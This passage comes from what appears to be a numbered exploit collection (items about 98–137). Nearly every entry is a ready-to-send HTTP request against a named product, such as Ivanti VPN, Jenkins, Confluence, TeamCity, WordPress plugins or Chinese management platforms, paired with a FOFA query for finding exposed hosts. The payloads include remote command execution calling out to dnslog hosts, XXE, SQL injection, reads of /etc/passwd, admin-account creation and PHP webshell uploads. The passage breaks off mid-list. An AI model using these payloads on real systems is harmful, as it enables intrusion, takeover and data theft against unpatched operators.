CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-Type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response (the file content is echoed back in the error message):
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated admin account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo (百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (百绰) Smart S40 management platform import (web.php) arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Baichuo (百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

File path: boot/web/upload/weblogo/1.php

122. 北京百绰智能 s200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx
125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. 广联达 Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 云商城 file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. 网康 NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立迅 communications command-and-dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
